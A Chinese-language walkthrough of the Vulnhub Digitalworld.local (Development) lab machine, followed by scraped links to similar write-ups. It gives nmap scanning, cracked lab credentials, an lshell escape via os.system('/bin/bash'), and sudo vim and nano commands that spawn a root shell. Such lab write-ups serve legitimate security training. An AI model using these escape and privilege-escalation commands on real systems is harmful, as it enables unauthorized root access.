kali:192.168.111.111

靶机:192.168.111.130

信息收集

端口扫描

nmap -A -v -sV -T5 -p- --script=http-enum 192.168.111.130

查看网站首页源码

访问development目录,提示存在一个流量包

查看流量包发现另一个网站路径:/developmentsecretpage/directortestpagev1.php

访问该路径后退出登录,再重新登录,用户名和密码随便填写,之后页面提示报错

根据报错搜索关键字

在exp中提示通过访问slog_users.txt获取敏感信息

md5解密

intern | 12345678900987654321
patrick | P@ssw0rd25
qiu | qiu

使用intern用户登录目标

lshell绕过

echo os.system('/bin/bash')

提权

使用之前得到的密码,切换到patrick用户查看sudo权限

vim提权

提权方法:vim | GTFOBins

sudo -u root vim -c ':!/bin/bash'

nano提权

提权方法:nano | GTFOBins

sudo -u root nano
^R^X
reset; sh 1>&0 2>&0

运行nano后,键盘ctrl+r

ctrl+x

输入命令:reset; sh 1>&0 2>&0,后回车

Vulnhub:Digitalworld.local (Development)靶机相关推荐

  1. Vulnhub:Digitalworld.local (Mercy v2)靶机

    kali:192.168.111.111 靶机:192.168.111.130 信息收集 端口扫描 nmap -A -v -sV -T5 -p- --script=http-enum 192.168. ...

  2. vulnhub - digitalworld.local: MERCY v2 (考点:信息搜集 smb 端口敲门 RIPS tomcat linux 提权)

    https://www.vulnhub.com/entry/digitalworldlocal-mercy-v2,263/ nat网络 arp-scan -l 比平常多出来的ip就是靶机了 nmap ...

  3. digitalworld.local: MERCY靶机入侵

    0x01 前言 MERCY是一个致力于PWK课程安全的靶机系统.MERCY是一款游戏名称,与易受攻击的靶机名称无关.本次实验是攻击目标靶机获取root权限并读系统目录中的proof.txt信息 靶机的 ...

  4. OSCP练习:vulhub靶机DIGITALWORLD.LOCAL: MERCY v2

    nmap扫下端口 nmap -sS -sV 192.168.8.144 发现22.80是关的,应该需要敲门 8080是tomcat页面,但是manager没密码控制台进不去, 提示主机管理器 Web ...

  5. vulnhub:THOTH TECH:1靶机

    一.信息收集 扫描主机 扫描端口 访问80端口,apache页面 二.信息利用 尝试访问21端口,试试弱口令 发现可以登录anonymous匿名访问 有个note.txt文件,下载文件: 提示:用户名 ...

  6. 靶机渗透练习56-digitalworld.local:TORMENT

    靶机描述 靶机地址:https://www.vulnhub.com/entry/digitalworldlocal-torment,299/ Description This is the evil ...

  7. 靶机渗透练习53-digitalworld.local:BRAVERY

    靶机描述 靶机地址:https://www.vulnhub.com/entry/digitalworldlocal-bravery,281/ Description This machine hope ...

  8. 靶机渗透练习58-digitalworld.local:VENGEANCE

    靶机描述 靶机地址:https://www.vulnhub.com/entry/digitalworldlocal-vengeance,704/ Description 2021 brings us ...

  9. Vulnhub靶机Wakanda渗透测试攻略

    前言 Wakanda是一个新的交易市场网站,很快会上线了.你的目标是通过黑客技术找到"振金"的确切位置. 页首配图 本vulnhub靶机环境由xMagass开发,并托管于Vulnh ...

最新文章

  1. 设置CentOS 6.6系统默认的语言为中文
  2. 【题解】 HDU 2570 迷瘴
  3. 【转】从源码分析PreparedStatement是如何防止SQL注入的?
  4. 独家下载!Java工程师成神必备宝典
  5. 为什么这个SQL Server DBA学习PowerShell--SQL任务
  6. 创建oracle 数据库表空间,角色,用户的sql语句
  7. 3 二分频verilog与Systemverilog编码
  8. nginx 逻辑运算
  9. Python利用情感词典做情感分析
  10. python分布式定时任务_分布式定时任务框架——python定时任务框架APScheduler扩展...
  11. 狄拉克量子力学原理【1】态叠加原理
  12. redis的lpush、rpush、rpop、lpop位置的简单理解
  13. 计蒜客1185出书最多
  14. 音频处理——音频编码原理简介
  15. 圣诞节计算机音乐,圣诞节的背景音乐
  16. android日历订阅,Android日历.
  17. 【原创】QT5-卸载精灵v1.0-卸载windows软件-简易版
  18. 用python读取dat文件,wifi数据采集工具csi tool数据文件(.dat文件)解析
  19. Mysql You can‘t specify target table ‘表名‘ for update in FROM clause错误解决方案
  20. 军工企业信息化与信息安全概要

热门文章

  1. python 爬取豆瓣书籍信息
  2. 外企、国企、名企 笔记
  3. 攒一台自己的深度学习主机
  4. linux modprobe 和 insmod
  5. 帕累托分布Pareto distribution
  6. python协程(4): asyncio结合多线程解决阻塞问题以及timer模拟
  7. 垃圾分类算法训练及部署
  8. STM32定时器配置
  9. 【Python爬虫】实现资源自由新手必读
  10. Ceph分布式存储 原理+架构图详解